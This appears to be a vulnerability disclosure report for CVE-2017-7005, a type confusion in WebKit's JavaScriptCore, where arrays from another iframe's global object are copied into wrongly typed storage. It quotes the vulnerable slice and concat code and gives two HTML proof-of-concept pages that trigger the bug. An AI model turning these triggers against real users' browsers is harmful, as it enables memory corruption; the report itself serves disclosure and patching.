WebKit JSC JSGlobalObject::haveABadTime Type Confusion

` WebKit: JSC: JSGlobalObject::haveABadTime causes type confusions   
  
CVE-2017-7005  
  
  
After JSGlobalObject::haveABadTime is called, the type of all JavaScript arrays(including newly created arrays) are of the same type: ArrayWithSlowPutArrayStorage. But (of course) this only affects objects that share the same JSGlobalObject. So arrays come from another JSGlobalObject can cause type confusions.  
  
void JSGlobalObject::haveABadTime(VM& vm)  
{  
...  
for (unsigned i = 0; i < NumberOfIndexingShapes; ++i)  
m_arrayStructureForIndexingShapeDuringAllocation[i].set(vm, this, originalArrayStructureForIndexingType(ArrayWithSlowPutArrayStorage)); <<-- The type of a newly created array will be ArrayWithSlowPutArrayStorage  
...  
while (!foundObjects.isEmpty()) {  
JSObject* object = asObject(foundObjects.last());  
foundObjects.removeLast();  
ASSERT(hasBrokenIndexing(object));  
object->switchToSlowPutArrayStorage(vm); <<------ switch type of an old array  
}  
}  
  
  
1. fastSlice:  
JSArray* JSArray::fastSlice(ExecState& exec, unsigned startIndex, unsigned count)  
{  
auto arrayType = indexingType();  
switch (arrayType) {  
case ArrayWithDouble:  
case ArrayWithInt32:  
case ArrayWithContiguous: {  
VM& vm = exec.vm();  
if (count >= MIN_SPARSE_ARRAY_INDEX || structure(vm)->holesMustForwardToPrototype(vm))  
return nullptr;  
  
Structure* resultStructure = exec.lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(arrayType);  
JSArray* resultArray = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, count);  
if (!resultArray)  
return nullptr;  
  
auto& resultButterfly = *resultArray->butterfly();  
if (arrayType == ArrayWithDouble)  
memcpy(resultButterfly.contiguousDouble().data(), m_butterfly.get()->contiguousDouble().data() + startIndex, sizeof(JSValue) * count);  
else  
memcpy(resultButterfly.contiguous().data(), m_butterfly.get()->contiguous().data() + startIndex, sizeof(JSValue) * count);  
resultButterfly.setPublicLength(count);  
  
return resultArray;  
}  
default:  
return nullptr;  
}  
}  
  
If |this| came from another JSGlobalObject, and |haveABadTime| was called, the type of |resultArray| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.  
  
<html>  
<body>  
<script>  
  
Array.prototype.__defineGetter__(100, () => 1);  
  
let f = document.body.appendChild(document.createElement('iframe'));  
let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320);  
  
let c = Array.prototype.slice.call(a);  
alert(c);  
  
</script>  
</body>  
</html>  
  
2. arrayProtoPrivateFuncConcatMemcpy  
EncodedJSValue JSC_HOST_CALL arrayProtoPrivateFuncConcatMemcpy(ExecState* exec)  
{  
...  
JSArray* firstArray = jsCast<JSArray*>(exec->uncheckedArgument(0));  
...  
IndexingType type = firstArray->mergeIndexingTypeForCopying(secondType);  
...  
Structure* resultStructure = exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(type);  
JSArray* result = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, firstArraySize + secondArraySize);  
if (!result)  
return JSValue::encode(throwOutOfMemoryError(exec, scope));  
  
if (type == ArrayWithDouble) {  
double* buffer = result->butterfly()->contiguousDouble().data();  
memcpy(buffer, firstButterfly->contiguousDouble().data(), sizeof(JSValue) * firstArraySize);  
memcpy(buffer + firstArraySize, secondButterfly->contiguousDouble().data(), sizeof(JSValue) * secondArraySize);  
} else if (type != ArrayWithUndecided) {  
WriteBarrier<Unknown>* buffer = result->butterfly()->contiguous().data();  
memcpy(buffer, firstButterfly->contiguous().data(), sizeof(JSValue) * firstArraySize);  
if (secondType != ArrayWithUndecided)  
memcpy(buffer + firstArraySize, secondButterfly->contiguous().data(), sizeof(JSValue) * secondArraySize);  
else {  
for (unsigned i = secondArraySize; i--;)  
buffer[i + firstArraySize].clear();  
}  
}  
  
result->butterfly()->setPublicLength(firstArraySize + secondArraySize);  
return JSValue::encode(result);  
}  
  
If |firstArray| came from another JSGlobalObject, and |haveABadTime| was called, the type of |result| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.  
  
PoC:  
<html>  
<body>  
<script>  
  
Array.prototype.__defineGetter__(100, () => 1);  
  
let f = document.body.appendChild(document.createElement('iframe'));  
let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);  
let b = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);  
  
let c = Array.prototype.concat.call(a, b);  
  
alert(c);  
  
</script>  
</body>  
</html>  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`